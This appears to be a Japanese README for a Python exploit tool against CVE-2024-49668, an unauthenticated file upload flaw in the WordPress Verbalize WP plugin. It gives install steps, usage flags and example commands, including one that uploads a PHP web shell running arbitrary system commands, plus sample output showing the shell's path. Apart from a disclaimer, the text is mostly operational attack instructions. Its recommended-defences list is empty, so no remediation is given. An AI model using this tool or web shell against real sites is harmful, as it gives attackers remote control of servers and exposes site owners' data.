
WordPress Verbalize WP プラグイン <= 1.0 - 任意ファイルアップロードの脆弱性
CVE-2024-49668 は、WordPress の Verbalize WP プラグインバージョン 1.0 以下における重大な脆弱性です。この脆弱性により、認証されていない攻撃者が Web シェルを含む任意のファイルを Web サーバーにアップロードできます。この問題は、ファイルアップロード時の入力検証とファイルタイプ制限が不十分であるために発生します。
この Python スクリプトは CVE-2024-49668 の脆弱性を悪用して、Verbalize WP プラグインを使用している対象の WordPress サイトにシェルファイルをアップロードします。
readme.txt 内のプラグインバージョンを確認することで、対象サイトが脆弱かどうかを検証します。requests ライブラリ必要なライブラリを pip でインストールします:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
Execute a POST request to a WordPress site.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-s, --shell SHELL Shell code to upload
デフォルトでは、スクリプトは phpinfo() を実行する PHP シェルをアップロードします。
python CVE-2024-49668.py -u http://target.com
アップロードするカスタム PHP シェルコードを指定することもできます:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
CVE-2024-49668 の脆弱性により、攻撃者は悪意のあるファイルをアップロードして対象サーバーを完全に制御できるようになります。この脆弱性を悪用すると、データ漏洩、不正アクセス、Web サイトの改ざんの可能性など、深刻な結果を招く恐れがあります。
この脆弱性から WordPress サイトを保護するには、以下を推奨します:
このツールは教育目的のみを対象としています。所有者の明示的な許可なしに Web サイトに対してこのツールを不正使用することは違法です。著者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。
2025-03-22 に Nxploited , Khaled alenazi によって作成